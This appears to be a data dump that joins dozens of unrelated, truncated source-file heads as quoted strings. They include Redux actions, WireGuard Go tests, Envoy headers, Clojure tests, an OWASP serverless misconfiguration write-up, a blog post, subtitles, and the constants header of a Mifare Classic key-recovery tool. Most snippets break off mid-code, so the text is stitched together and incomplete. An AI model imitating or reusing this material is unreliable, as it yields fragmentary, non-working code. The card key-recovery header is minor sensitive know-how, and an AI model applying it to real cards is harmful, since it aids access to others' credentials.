Action<Actions.BACKUP_SET_URL> {\n readonly location: BackupLocation;\n readonly url: string;\n}\n\nexport function configurationImported(configuration: Configuration): ActionConfigurationImported {\n return {type: Actions.CONFIGURATION_IMPORTED, configuration}\n}\n\nexport function backupSetId(location: BackupLocation, id: string): ActionBackupSetId {\n return {type: Actions.BACKUP_SET_ID, location, id}\n}\n\nexport function backupSetDescription(location: BackupLocation, description: string): ActionBackupSetDescription {\n return {type: Actions.BACKUP_SET_DESCRIPTION, location, description}\n}\n\nexport function backupSetUrl(location: BackupLocation, url: string): ActionBackupSetUrl {\n return {type: Actions.BACKUP_SET_URL, location, url}\n}" +"/* SPDX-License-Identifier: MIT\n *\n * Copyright (C) 2019 WireGuard LLC. All Rights Reserved.\n */\n\n/*\n\nSome tests in this file require:\n\n- A dedicated network adapter\n\tAny network adapter will do. It may be virtual (Wintun etc.). The adapter name\n\tmust contain string \"winipcfg_test\".\n\tTests will add, remove, flush DNS servers, change adapter IP address, manipulate\n\troutes etc.\n\tThe adapter will not be returned to previous state, so use an expendable one.\n\n- Elevation\n\tRun go test as Administrator\n\n*/\n\npackage winipcfg\n\nimport (\n\t\"bytes\"\n\t\"net\"\n\t\"strings\"\n\t\"testing\"\n\t\"time\"\n\n\t\"golang.org/x/sys/windows\"\n)\n\nconst (\n\ttestInterfaceMarker = \"winipcfg_test\" // The interface we will use for testing must contain this string in its name\n)\n\n// TODO: Add IPv6 tests.\nvar (\n\tunexistentIPAddresToAdd = net.IPNet{\n\t\tIP: net.IP{172, 16, 1, 114},\n\t\tMask: net.IPMask{255, 255, 255, 0},\n\t}\n\tunexistentRouteIPv4ToAdd = RouteData{\n\t\tDestination: net.IPNet{\n\t\t\tIP: net.IP{172, 16, 200, 0},\n\t\t\tMask: net.IPMask{255, 255, 255, 0},\n\t\t},\n\t\tNextHop: net.IP{172, 16, 1, 2},\n\t\tMetric: 0,\n\t}\n\tdnsesToSet = []net.IP{\n\t\tnet.IPv4(8, 8, 8, 8),\n\t\tnet.IPv4(8, 8, 4, 4),\n\t}\n)\n\nfunc runningElevated() bool {\n\tvar process windows.Token\n\terr := windows.OpenProcessToken(windows.CurrentProcess(), windows.TOKEN_QUERY, &process)\n\tif err != nil {\n\t\treturn false\n\t}\n\tdefer process.Close()\n\treturn process.IsElevated()\n}\n\nfunc getTestInterface() (*IPAdapterAddresses, error) {" +"#include \"DataFormats/HcalDigi/interface/QIE10DataFrame.h\"\n#include \"DataFormats/HcalDetId/interface/HcalGenericDetId.h\"\n\nstd::ostream& operator<<(std::ostream& s, const QIE10DataFrame& digi) {\n if (digi.detid().det() == DetId::Hcal) {\n s << HcalGenericDetId(digi.detid());\n } else {\n s << \"DetId(\" << digi.detid().rawId() << \")\";\n }\n s << \" \" << digi.samples() << \" samples\";\n if (digi.linkError())\n s << \" LinkError \";\n if (digi.zsMarkAndPass())\n s << \" MaP \";\n s << std::endl;\n for (int i = 0; i < digi.samples(); i++) {\n QIE10DataFrame::Sample sam = digi[i];\n s << \" ADC=\" << sam.adc() << \" TDC(LE)=\" << sam.le_tdc() << \" TDC(TE)=\" << sam.te_tdc()\n << \" CAPID=\" << sam.capid();\n if (sam.soi())\n s << \" SOI \";\n if (!sam.ok())\n s << \" !OK \";\n s << std::endl;\n }\n return s;\n}" +"#include <set>\n#include <cstdio>\n#include <algorithm>\n\nusing namespace std;\n\nconst int HEIHGT = 100;\nconst int WIDTH = 2 * 100000;\n\nstruct Mirror {\n int a, b, c;\n\n Mirror(int a, int b, int c): a(a), b(b), c(c) {\n }\n\n bool operator<(const Mirror& o) const {\n return a < o.a;\n }\n};\n\nint getId(const vector<Mirror>& v, int x) {\n int i = upper_bound(v.begin(), v.end(), Mirror(x, x, x)) - v.begin();\n --i;\n if (i < 0 || x > v[i].b) {\n i = -1;\n }\n /*\n printf(\"getId(%p, %d) = (%d, %d, %d)\\n\", &v, x,\n i == -1 ? -1 : v[i].a,\n i == -1 ? -1 : v[i].b,\n i == -1 ? -1 : v[i].c);\n */\n return i;\n}\n\nint intdiv(int num, int den) {\n if (num % den == 0) {\n return num / den;\n } else {\n int ret = num / den;\n if (ret % 2 == 0) {\n ++ret;\n }\n return ret;\n }\n}\n\nint main() {\n char type;\n int h1, h2, n, a, b, c;\n vector<Mirror> up, down;\n\n scanf(\"%d%d%d\", &h1, &h2, &n);\n for (int i = 0; i < n; ++i) {\n scanf(\"%d %c%d%d\", &c, &type, &a, &b);\n if (type == 'T') {\n up.push_back(Mirror(2 * a, 2 *" +"package emissary.pickup;\n\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\n\nimport emissary.server.mvc.adapters.WorkSpaceAdapter;\n\n/**\n * Implementation of a pick up place that talks to a one or more WorkSpace instances for obtaining distributed work.\n */\npublic abstract class PickUpSpace extends emissary.pickup.PickUpPlace implements IPickUpSpace {\n // List of workspace instances to interact with\n protected List<String> openSpaceNames = new ArrayList<String>();\n\n // Map of how many consecutive take errors by workspace name\n protected Map<String, Integer> numConsecutiveTakeErrors = new HashMap<String, Integer>();\n\n // Comms adapter\n protected WorkSpaceAdapter tpa = new WorkSpaceAdapter();\n\n // Map of last bundle size by workspace name\n protected Map<String, Integer> lastBundleSize = new HashMap<String, Integer>();\n\n // Map of pending bundles to workspace name to facilitate replying\n protected Map<String, String> pendingBundles = new HashMap<String, String>();\n\n // Number of consecutive take errors that cause space to close\n protected int TAKE_ERROR_MAX = 10;\n\n /**\n * Create using default configuration\n */\n public PickUpSpace() throws IOException {\n super();\n }\n\n /**\n * Create one\n * \n * @param configInfo path to config file\n * @param dir string key of the directory to register with\n * @param placeLocation string key of this place\n */\n public PickUpSpace(String configInfo, String dir, String placeLocation) throws IOException {\n super(configInfo, dir, placeLocation);" +"#pragma once\n\n#include \"envoy/common/pure.h\"\n#include \"envoy/http/message.h\"\n\nnamespace Envoy {\nnamespace Extensions {\nnamespace Common {\nnamespace Aws {\n\nclass Signer {\npublic:\n virtual ~Signer() = default;\n\n /**\n * Sign an AWS request.\n * @param message an AWS API request message.\n * @param sign_body include the message body in the signature. The body must be fully buffered.\n * @throws EnvoyException if the request cannot be signed.\n */\n virtual void sign(Http::RequestMessage& message, bool sign_body) PURE;\n\n /**\n * Sign an AWS request.\n * @param headers AWS API request headers.\n * @throws EnvoyException if the request cannot be signed.\n */\n virtual void sign(Http::RequestHeaderMap& headers) PURE;\n\n /**\n * Sign an AWS request.\n * @param headers AWS API request headers.\n * @param content_hash The Hex encoded SHA-256 of the body of the AWS API request.\n * @throws EnvoyException if the request cannot be signed.\n */\n virtual void sign(Http::RequestHeaderMap& headers, const std::string& content_hash) PURE;\n};\n\nusing SignerPtr = std::unique_ptr<Signer>;\n\n} // namespace Aws\n} // namespace Common\n} // namespace Extensions\n} // namespace Envoy" +"(ns nevergreen.middleware.wrap-exceptions-test\n (:require [clojure.test :refer :all]\n [nevergreen.middleware.wrap-exceptions :as subject]\n [nevergreen.errors :as errors]))\n\n(deftest wrap-exceptions\n\n (binding [errors/now (constantly \"some-time\")]\n\n (testing \"exceptions should be get a 500 status and a generic message\"\n (let [app (fn [_] (throw (Exception. \"message\")))\n req {:uri \"some-url\"}\n res ((subject/wrap-exceptions app) req)]\n (is (= (errors/error-response 500 \"An unhandled exception was thrown\" \"some-url\") res))))\n\n (testing \"exception infos should use the message and status from the exception\"\n (let [app (fn [_] (throw (ex-info \"some-message\" {:status 502})))\n req {:uri \"some-url\"}\n res ((subject/wrap-exceptions app) req)]\n (is (= (errors/error-response 502 \"some-message\" \"some-url\") res))))\n\n (testing \"returns 500 if the exception info does not contain a status\"\n (let [app (fn [_] (throw (ex-info \"some-message\" {})))\n req {:uri \"some-url\"}\n res ((subject/wrap-exceptions app) req)]\n (is (= (errors/error-response 500 \"some-message\" \"some-url\") res))))))" +"# S6:2017 Security Misconfiguration\n\n## Attack Vectors\n\nUnused pages are replaced with unlinked triggers, unprotected files and directories are changed to public resources, like public buckets. Attackers will try to identify misconfigured functions with long timeout or low concurrency limit in order to cause a Denial of Service (DoS). Additionally, functions which contain unprotected secrets like keys and token in the code or the environment could eventually result in sensitive information leakage.\n\n## Security Weakness\n\nServerless reduces the need to to patch the environment, since we do not control the infrastructure. However, in many cases the biggest weakness is human error. Secrets could be [accidently uploaded to the github repo](https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/), put it on a public bucket or even used hardcoded in the function.\n\nAdditionally, functions with long timeout configuration give an attacker the opportunity to make their exploit last longer or just cause an increased charge for the function execution.\n\nMoreover, functions with low concurrency limit could lead into a DoS attack, while functions with high concurrency limit could result in a Denial of Wallet (see [Other Risks](0xab-other-risks.md) section)\n\n## Impact\n\nMisconfiguration could lead to sensitive information leakage, money loss, DoS or in severe cases, unauthorized access to cloud resources." +"\nTransaction Manager\n--------------------\n\n| name | type | description |\n|---|---|---|\n| transaction.online\\_rw | int, ro | Number of active RW transactions. |\n| transaction.online\\_ro | int, ro | Number of active RO transactions. |\n| transaction.commit | int, ro | Total number of completed transactions. |\n| transaction.rollback | int, ro | Total number of transaction rollbacks. |\n| transaction.conflict | int, ro | Total number of transaction conflicts. |\n| transaction.lock | int, ro | Total number of transaction locks. |\n| transaction.latency | string, ro | Average transaction latency from begin till commit. |\n| transaction.log | string, ro | Average transaction log length. |\n| transaction.vlsn | int, ro | Current VLSN. |\n| transaction.gc | int, ro | SSI GC queue size. |" +"import { BTree } from './btree'\n\nexport function tokIsKeyword(t :token) :bool {\n return token.keyword_beg < t && t < token.keyword_end\n}\n\nexport function hasIntValue(t :token) :bool {\n return t == token.CHAR\n}\n\nexport function hasByteValue(t :token) :bool {\n return (\n (token.literal_beg < t && t < token.literal_end) ||\n t == token.COMMENT\n )\n}\n\n// Operator precedences\nexport enum prec {\n LOWEST, // = := ! <- ->\n OROR, // ||\n ANDAND, // &&\n CMP, // == != < <= > >=\n ADD, // + - | ^\n MUL, // * / % & &^ << >>\n}\n\nexport enum token {\n // Special tokens\n ILLEGAL = 0,\n EOF,\n COMMENT,\n DIRECTIVE, // #directive\n\n literal_beg,\n // Identifiers and basic type literals\n // (these tokens stand for classes of literals)\n NAME, // main\n NAMEAT, // @foo, @\n literal_num_beg,\n literal_int_beg,\n CHAR, // 'a'\n INT, // 12345\n INT_BIN, // 0b1010\n INT_OCT, // 0o6737\n INT_HEX, // 0xBE3f\n literal_int_end,\n FLOAT, // 123.45\n // RATIO, // 22/7\n literal_num_end,\n STRING, // \"abc\"\n STRING_MULTI, // \"ab\\nc\" \u2014 multi-line\n STRING_PIECE, // \"a ${...} b\" -- the \"a \" part (\" b\" is STRING)\n literal_end,\n\n // Delimiters\n delim_beg,\n LPAREN, // (\n LBRACKET, // [\n LBRACE, // {\n COMMA, // ,\n DOT, //" +"(ns puppetlabs.puppetdb.cli.benchmark\n \"Benchmark suite\n\n This command-line utility will simulate catalog submission for a\n population. It requires that a separate, running instance of\n PuppetDB for it to submit catalogs to.\n\n Aspects of a population this tool currently models:\n\n * Number of nodes\n * Run interval\n * How often a host's catalog changes\n * A starting catalog\n\n We attempt to approximate a number of hosts submitting catalogs at\n the specified runinterval with the specified rate-of-churn in\n catalog content.\n\n The list of nodes is modeled in the tool as a set of Clojure\n agents, with one agent per host. Each agent has the following\n state:\n\n {:host ;; the host's name\n :lastrun ;; when the host last sent a catalog\n :catalog ;; the last catalog sent}\n\n When a host needs to submit a new catalog, we determine if the new\n catalog should be different than the previous one (based on a\n user-specified threshold) and send the resulting catalog to\n PuppetDB.\n\n ### Main loop\n\n The main loop is written in the form of a wall-clock\n simulator. Each run through the main loop, we send each agent an\n `update` message with the current wall-clock. Each agent decides\n independently whether or not to submit a catalog during" +"---\ntitle: How to write a good coding article\nlayout: post\nslug: writing-good-coding-articles\ntags:\n - teaching\n - writing\nnewsletter: better-fed\ndescription: A good article shows a student how to think through a problem. The student will go \"oooohhhhh!\" as they read through the article. You can write a good programming article if you watch out for these five factors.\n---\n\nA good article shows a student how to think through a problem. The student will go \"oooohhhhh!\" as they read through the article. They'll understand the concept they're trying to learn, and they'll stop searching the web for the same topic.\n\nLousy articles do the opposite. Students get more confused as they read through the article. They may even wonder if they have what it takes to learn programming.\n\nIt doesn't take much to turn a bad article into a good one. The content can remain the same. You only need to get five factors right.\n\n<!-- more -->\n\n## The five factors\n\nThe five factors are:\n\n1. The purpose of your article\n2. Who's the student\n3. The examples and analogies used\n4. The language used\n5. The ease of reading\n\n## The purpose of your article\n\nImagine you're" +"\ufeffusing Library.UI.DTOs;\nusing Library.UI.Utilities;\nusing Library.UI.ViewModels;\nusing System;\nusing System.Collections.Generic;\nusing System.Web.Mvc;\n\nnamespace Library.UI.Controllers\n{\n\tpublic class BookController : BaseController\n\t{\n\t\tpublic BookController()\n\t\t{\n\t\t}\n\n\t\t[HttpGet]\n\t\tpublic ActionResult List()\n\t\t{\n\t\t\tvar data = ApiRequest.Get<List<BookViewModel>>($\"{_apiGatewayUrl}/api/books\");\n\t\t\treturn View(data);\n\t\t}\n\n\t\t[HttpGet]\n\t\tpublic ActionResult Add()\n\t\t{\n\t\t\treturn View();\n\t\t}\n\n\t\t[HttpGet]\n\t\tpublic ActionResult Edit(Guid id)\n\t\t{\n\t\t\tvar data = ApiRequest.Get<EditBookDTO>($\"{_apiGatewayUrl}/api/books/{id}\");\n\n\t\t\treturn View(data);\n\t\t}\n\n\t\t[HttpPost]\n\t\tpublic ActionResult Edit(Guid id, EditBookDTO dto)\n\t\t{\n\t\t\tvar commandId = ApiRequest.Put<Guid>($\"{_apiGatewayUrl}/api/books/{dto.BookId}\", dto);\n\n\t\t\tif (commandId != Guid.Empty)\n\t\t\t{\n\t\t\t\treturn RedirectToAction(\"List\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\treturn View(dto);\n\t\t\t}\n\t\t}\n\n\t\t[HttpPost]\n\t\tpublic ActionResult Add(AddBookDTO dto)\n\t\t{\n\t\t\tvar commandUnqiueId = ApiRequest.Post<Guid>($\"{_apiGatewayUrl}/api/books\", dto);\n\n\t\t\treturn Json(new { commandUnqiueId = commandUnqiueId });\n\t\t}\n\n\t\t[HttpGet]\n\t\tpublic ActionResult _AjaxGetAvailableBooks()\n\t\t{\n\t\t\tvar data = ApiRequest.Get<List<AvailableBookModel>>($\"{_apiGatewayUrl}/api/available_books\");\n\t\t\treturn Json(data, JsonRequestBehavior.AllowGet);\n\t\t}\n\t}\n}" +"/* Part of Cosmos by OpenGenus Foundation */\n\n// Union-find stores a graph, and allows two operations in amortized constant time:\n// * Add a new edge between two vertices.\n// * Check if two vertices belong to same component.\n\n#include <unordered_map>\n#include <unordered_set>\n#include <algorithm>\n\n// dynamic union find (elementary implementation)\ntemplate<typename _ValueType, typename _Hash = std::hash<_ValueType>>\nclass UnionFind\n{\npublic:\n using value_type = _ValueType;\n\n UnionFind()\n {\n }\n\n// Connect vertices `a` and `b`.\n void merge(value_type a, value_type b)\n {\n // 1. to guarantee that the set has both `a` and `b`\n auto na = nodes.find(a);\n auto nb = nodes.find(b);\n\n if (na == nodes.end())\n {\n nodes.insert(a);\n na = nodes.find(a);\n parents.insert({na, na});\n }\n\n if (nb == nodes.end())\n {\n nodes.insert(b);\n nb = nodes.find(b);\n parents.insert({nb, nb});\n }\n\n // 2. update the map\n auto pa = parents.find(na);\n\n while (pa != parents.end() && pa->first != pa->second)\n pa = parents.find(pa->second);\n\n if (pa != parents.end())\n na = pa->second;\n\n parents[na] = nb;\n }\n\n value_type find(value_type node)\n {\n auto root = nodes.find(node);\n\n // new node\n if (root == nodes.end())\n {\n // auto it = nodes.insert(node);\n nodes.insert(node);\n auto it = nodes.find(node);\n parents.insert({it, it});\n\n return node;\n }\n // existed\n else\n {\n auto pr = parents.find(root);\n while (pr != parents.end() &&" +"\ufeffusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\n\nusing Microsoft.SharePoint.Client;\n\nnamespace SPMeta2.Regression.CSOM.Extensions\n{\n public static class MasterPageItemExtensions\n {\n public static List<string> GetUIVersion(this ListItem item)\n {\n var result = new List<string>();\n\n var values = item[\"UIVersion\"] as string[];\n\n if (values != null && values.Length > 0)\n result.AddRange(values);\n\n return result;\n }\n\n public static string GetTitle(this ListItem item)\n {\n return item[\"Title\"] as string;\n }\n\n public static string GetContentTypeName(this ListItem item)\n {\n return item.ContentType.Name;\n }\n\n public static string GetDefaultCSSFile(this ListItem item)\n {\n return item[\"DefaultCssFile\"] as string;\n }\n\n public static string GetFileName(this ListItem item)\n {\n return item[\"FileLeafRef\"] as string;\n }\n\n public static string GetPublishingPageDescription(this ListItem item)\n {\n return item[\"Comments\"] as string;\n }\n\n public static string GetPublishingPagePageLayoutFileName(this ListItem item)\n {\n var result = item[\"PublishingPageLayout\"] as FieldUrlValue;\n\n if (result != null)\n return result.Url;\n\n return string.Empty;\n }\n\n public static string GetMasterPageDescription(this ListItem item)\n {\n return item[\"MasterPageDescription\"] as string;\n }\n }\n}" +"<% use_js_layout :media %>\n\n<dl id=\"leftPanel\" class=\"panel\">\n <dt class=\"active\">\n <span class=\"content\">\n <% if current_user.allow?(:media_dir_create) %>\n <%= link_to(\n button_text(:add),\n skyline_media_dirs_path,\n :remote => true,\n :method => :post,\n :id => \"add_directory\",\n :class => \"button small right\")\n %>\n <script type=\"text/javascript\" charset=\"utf-8\">\n (function(){\n $('add_directory').addEvent(\"click\", function(e){\n e.stop();\n var d = {\"data\" : {\"parent_id\" : Application.getId($('dirtree').retrieve('skyline.tree').selectedNode.getParent('li').get('id'))}}\n var r = new Request.Rails(this, d);\n r.send();\n })\n })();\n </script>\n\n <%= t(:directories, :scope => [:media, :dirs, :index]) %>\n <% end %>\n </span>\n </dt>\n <dd class=\"last\">\n <div class=\"content scrollable\">\n <%= render :partial => \"skyline/media/dirs/index\" %>\n </div>\n </dd>\n</dl>\n\n<dl id=\"contentPanel\">\n <%= render :partial => \"skyline/media/dirs/show\" %>\n</dl>\n\n<div id=\"metaPanel\" class=\"scrollable\">\n <% if @file %>\n <%= render :partial => \"skyline/media/files/edit\" %>\n <% end %>\n <% if @dir && current_user.allow?(:media_dir_update) %>\n <%= render :partial => \"skyline/media/dirs/edit\" %>\n <% end %>\n</div>" +"package mao.com.mao_wanandroid_client.utils;\n\nimport com.google.gson.JsonIOException;\n\nimport org.json.JSONException;\n\nimport java.net.SocketTimeoutException;\nimport java.net.UnknownHostException;\nimport java.text.ParseException;\n\nimport retrofit2.HttpException;\n\n/**\n * @author maoqitian\n * @Description \u5f02\u5e38\u5904\u7406\u7c7b\n * @Time 2018/9/4 0004 22:55\n */\npublic class RxExceptionUtils {\n public static String exceptionHandler(Throwable throwable){\n String errorMsg=\"\u672a\u77e5\u5f02\u5e38\";\n if(throwable instanceof UnknownHostException){\n errorMsg=\"\u7f51\u7edc\u4e0d\u53ef\u7528\";\n }else if(throwable instanceof SocketTimeoutException){\n errorMsg=\"\u7f51\u7edc\u8fde\u63a5\u8d85\u65f6\";\n }else if(throwable instanceof HttpException){\n HttpException httpException= (HttpException) throwable;\n errorMsg=convertStatusCode(httpException);\n }else if(throwable instanceof ParseException || throwable instanceof JSONException\n || throwable instanceof JsonIOException){\n errorMsg = \"\u6570\u636e\u89e3\u6790\u9519\u8bef\";\n }\n return errorMsg;\n }\n\n /**\n * \u7f51\u7edc\u5f02\u5e38\u7c7b\u578b\u5904\u7406\u7c7b\n * @param httpException\n * @return\n */\n private static String convertStatusCode(HttpException httpException) {\n String msg;\n if(httpException.code()>=500 && httpException.code()<600){\n msg =\"\u670d\u52a1\u5668\u5904\u7406\u8bf7\u6c42\u9519\u8bef\";\n }else if(httpException.code()>=400 && httpException.code()<500){\n msg =\"\u670d\u52a1\u5668\u65e0\u6cd5\u5904\u7406\u8bf7\u6c42\";\n }else {\n msg =httpException.message();\n }\n return msg;\n }\n}" +"..\n ::\n {-# OPTIONS --rewriting #-}\n module language.built-ins where\n\n open import Agda.Builtin.Equality public\n open import Agda.Primitive\n\n postulate String : Set\n {-# BUILTIN STRING String #-}\n\n data \u22a5 : Set where\n\n record _\u00d7_ (A B : Set) : Set where\n constructor _,_\n field proj\u2081 : A\n proj\u2082 : B\n open _\u00d7_ public\n\n.. _built-ins:\n\n*********\nBuilt-ins\n*********\n\n.. contents::\n :depth: 1\n :local:\n\nThe Agda type checker knows about, and has special treatment for, a number of\ndifferent concepts. The most prominent is natural numbers, which has a special\nrepresentation as Haskell integers and support for fast arithmetic. The surface\nsyntax of these concepts are not fixed, however, so in order to use the special\ntreatment of natural numbers (say) you define an appropriate data type and then\nbind that type to the natural number concept using a ``BUILTIN`` pragma.\n\nSome built-in types support primitive functions that have no corresponding Agda\ndefinition. These functions are declared using the ``primitive`` keyword by\ngiving their type signature.\n\nUsing the built-in types\n------------------------\n\nWhile it is possible to define your own versions of the built-in types and bind\nthem using ``BUILTIN`` pragmas, it is recommended to use the definitions in the\n``Agda.Builtin`` modules. These modules" +"#ifndef CONFLUO_TYPES_SERDE_OPS_H_\n#define CONFLUO_TYPES_SERDE_OPS_H_\n\n#include <fstream>\n#include \"exceptions.h\"\n#include \"raw_data.h\"\n\nnamespace confluo {\n\n/** Serializes the raw immutable data to the output stream */\ntypedef void (*serialize_op_t)(std::ostream &, const immutable_raw_data &);\n/** Initializes the raw mutable data from the input stream */\ntypedef void (*deserialize_op_t)(std::istream &, mutable_raw_data &);\n\n/**\n * Serializes the raw immutable data to the specified output stream\n *\n * @tparam T The type of data the immutable raw data contains\n * @param out The output stream to write to\n * @param value The immutable raw data to serialize\n */\ntemplate<typename T>\ninline void serialize(std::ostream &out, const immutable_raw_data &value) {\n out.write(reinterpret_cast<const char *>(value.ptr), value.size);\n}\n\n/**\n * Serializes the raw immutable data to the specified output stream, \n * for the void type\n *\n * @param out The output stream to write to\n * @param value The immutable raw data to serialize\n * @throw unsupported_exception This operation is not defined for void\n * type\n */\ntemplate<>\ninline void serialize<void>(std::ostream &out, const immutable_raw_data &value) {\n THROW(unsupported_exception, \"Serialize not supported for none type\");\n}\n\n/**\n * Deserializes the data from the input stream to the given mutable\n * raw data value\n *\n * @tparam T The type of data the mutable" +"require File.expand_path('../../spec_helper', __FILE__)\n\ndescribe 'Project Dependency Patch' do\n\n before(:all) do\n Setting.cross_project_issue_relations = '1'\n\n # Issue 1 of Project 1 precedes issue 2 of the same project\n # Issue 1 precedes an issue of Project 2\n # Issue 2 precedes an issue of Project 3\n @first_project_issue1, @first_project_issue2 = create_related_issues(\"precedes\")\n @project1 = @first_project_issue1.project\n @project2, @project3 = Factory(:project), Factory(:project)\n @second_project_issue = Factory(:issue, :project => @project2)\n @third_project_issue = Factory(:issue, :project => @project3)\n create_related_issues(\"precedes\", @first_project_issue1, @second_project_issue)\n create_related_issues(\"precedes\", @first_project_issue2, @third_project_issue)\n end\n\n it 'should find cross project related issues' do\n @project1.cross_project_related_issues.count.should eql(2)\n @project1.cross_project_related_issues.should include(@second_project_issue, @third_project_issue)\n end\n\n it 'should find cross project related issues of other projects' do\n @project2.cross_project_related_issues.count.should eql(1)\n @project2.cross_project_related_issues.should include(@first_project_issue1)\n end\nend" +"1\n00:00:08,416 --> 00:00:09,326\n>> Good morning.\n\n\n2\n00:00:10,266 --> 00:00:12,406\nMy name is Jon Lee.\n\n\n3\n00:00:12,406 --> 00:00:15,576\nI am a manager on the\r\nSafari and WebKit team.\n\n\n4\n00:00:16,356 --> 00:00:18,936\nThis is Session 614 and\r\nyou are here to learn\n\n\n5\n00:00:18,936 --> 00:00:23,126\nabout Implementing OS X Push\r\nNotifications for Websites.\n\n\n6\n00:00:23,896 --> 00:00:28,526\nYou know, since iOS 3 and\r\nOS X Lion, you've been able\n\n\n7\n00:00:28,526 --> 00:00:32,375\nto integrate push notifications\r\ninto your native apps.\n\n\n8\n00:00:32,546 --> 00:00:34,576\nAnd boy, do users love them.\n\n\n9\n00:00:34,876 --> 00:00:40,026\nApple has sent over 7.4 trillion\r\npush notifications to users.\n\n\n10\n00:00:40,436 --> 00:00:43,096\nSo, clearly, users love\r\ngetting push notifications\n\n\n11\n00:00:43,396 --> 00:00:44,396\non their devices.\n\n\n12\n00:00:45,046 --> 00:00:45,706\nSo why is that?\n\n\n13\n00:00:45,706 --> 00:00:48,066\nWell, I love push notifications\n\n\n14\n00:00:48,106 --> 00:00:51,246\nbecause push notifications\r\ngives me the information\n\n\n15\n00:00:51,246 --> 00:00:54,136\nthat I really want to know\r\nabout and the app tells me\n\n\n16\n00:00:54,286 --> 00:00:56,326\nthat information at\r\nthe best time it is\n\n\n17\n00:00:56,326 --> 00:00:57,986\nfor me get it which\r\nis immediately.\n\n\n18\n00:00:58,116 --> 00:01:00,816\nI don't have" +"#pragma once\n\n#include <string>\nnamespace ParaEngine\n{\n\tusing namespace std;\n\t/**\n\t* helper functions for editing. It is a group of static helper functions for scene editing. \n\t*/\n\tclass PE_CORE_DECL CEditorHelper\n\t{\n\tpublic:\n\t\t/**\n\t\t* return the file name from a given script text. \n\t\t* It searches \"NPL.load(\\\"\" in the script text, and returns its first string parameter. \n\t\t* @param output: output file name\n\t\t* @param sScript: script text. if the file name is not found within the first MAX_PATH=260 characters, \"\" is returned. \n\t\t* @param bRelativePath: if true, relative path is returned. if false, the complete NPL path in the script is returned, which may contain (gl) prefix.\n\t\t* @return: true if found. \n\t\t*/\n\t\tstatic bool SearchFileNameInScript(string & output, const char* sScript, bool bRelativePath = true);\n\t\t/** same as SearchFileNameInScript(). only used for API exportation. Not thread-safe*/\n\t\tstatic const char* SearchFileNameInScript_(const char* sScript, bool bRelativePath);\n\n\t\t/**\n\t\t* Open a given file with the default registered editor in the game engine. \n\t\t* @param sFileName: file name to be opened by the default editor.\n\t\t* @param bWaitOnReturn: if false, the function returns immediately; otherwise it will wait for the editor to return. \n\t\t* @return true if opened. \n\t\t*/\n\t\tstatic bool OpenWithDefaultEditor(" +"import {COMPOUND_FIELD_RGX} from \"../compoundField\"\nimport {isString} from \"../../lib/is\"\n\ntype ZngRecordType = {name: string; type: ZngRecordType | string}[]\n\nexport default function zngToZeekTypes(zng: ZngRecordType): ZngRecordType {\n return zng.map((t) => ({\n name: t.name,\n type: recursiveReplace(t.type)\n }))\n}\n\nfunction recursiveReplace(zng: ZngRecordType | string): ZngRecordType | string {\n if (isString(zng)) return getZeekType(zng)\n else return zngToZeekTypes(zng)\n}\n\nfunction getZeekType(type: string): string {\n const match = type.match(COMPOUND_FIELD_RGX)\n if (match) {\n const [_, container, itemType] = match\n const zeekType = getSingleZeekType(itemType)\n return `${container}[${zeekType}]`\n } else {\n return getSingleZeekType(type)\n }\n}\n\nfunction getSingleZeekType(type) {\n switch (type) {\n case \"byte\":\n case \"int16\":\n case \"int32\":\n case \"int64\":\n case \"uint16\":\n case \"uint32\":\n return \"int\"\n case \"uint64\":\n return \"count\"\n case \"float64\":\n return \"double\"\n case \"ip\":\n return \"addr\"\n case \"net\":\n return \"subnet\"\n case \"duration\":\n return \"interval\"\n case \"bstring\":\n return \"string\"\n case \"zenum\":\n return \"enum\"\n default:\n return type\n }\n}" +"#define MEM_CHUNK 10000\n#define TRY_KEYS 50\n\n// Number of trailers == number of sectors\n// Mifare Classic 1k 16x64b = 16\n#define NR_TRAILERS_1k (16)\n// Mifare Classic Mini\n#define NR_TRAILERS_MINI (5)\n// Mifare Classic 4k 32x64b + 8*256b = 40\n#define NR_TRAILERS_4k (40)\n// Mifare Classic 2k 32x64b\n#define NR_TRAILERS_2k (32)\n\n// Number of blocks\n// Mifare Classic 1k\n#define NR_BLOCKS_1k 0x3f\n// Mifare Classic Mini\n#define NR_BLOCKS_MINI 0x13\n// Mifare Classic 4k\n#define NR_BLOCKS_4k 0xff\n// Mifare Classic 2k\n#define NR_BLOCKS_2k 0x7f\n\n#define MAX_FRAME_LEN 264\n\n// Used for counting nonce distances, explore [nd-value, nd+value]\n#define DEFAULT_TOLERANCE 20\n\n// Default number of distance probes\n#define DEFAULT_DIST_NR 15\n\n// Default number of probes for a key recovery for one sector\n#define DEFAULT_PROBES_NR 150\n\n// Number of sets with 32b keys\n#define DEFAULT_SETS_NR 5\n\n#define odd_parity(i) (( (i) ^ (i)>>1 ^ (i)>>2 ^ (i)>>3 ^ (i)>>4 ^ (i)>>5 ^ (i)>>6 ^ (i)>>7 ^ 1) & 0x01)\n\ntypedef struct {\n uint8_t KeyA[6];\n uint8_t KeyB[6];\n bool foundKeyA;\n bool foundKeyB;\n uint8_t trailer; // Value of a trailer block\n} sector;\n\ntypedef struct {\n uint32_t *distances;\n uint32_t median;\n uint32_t num_distances;\n uint32_t tolerance;\n uint8_t parity[3]; // used for 3 bits of parity information\n} denonce; // Revealed" +"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport csv\nimport numpy as np\nimport os\nimport sys\n\nfrom observations.util import maybe_download_and_extract\n\n\ndef science(path):\n \"\"\"School Science Survey Data\n\n The `science` data frame has 1385 rows and 7 columns.\n\n The data are on attitudes to science, from a survey where there were\n results from 20 classes in private schools and 46 classes in public\n schools.\n\n This data frame contains the following columns:\n\n State\n a factor with levels `ACT` Australian Capital Territory, `NSW`\n New South Wales\n\n PrivPub\n a factor with levels `private` school, `public` school\n\n school\n a factor, coded to identify the school\n\n class\n a factor, coded to identify the class\n\n sex\n a factor with levels `f`, `m`\n\n like\n a summary score based on two of the questions, on a scale from 1\n (dislike) to 12 (like)\n\n Class\n a factor with levels corresponding to each class\n\n Francine Adams, Rosemary Martin and Murali Nayadu, Australian National\n University\n\n Args:\n\n path: str.\n Path to directory which either stores file or 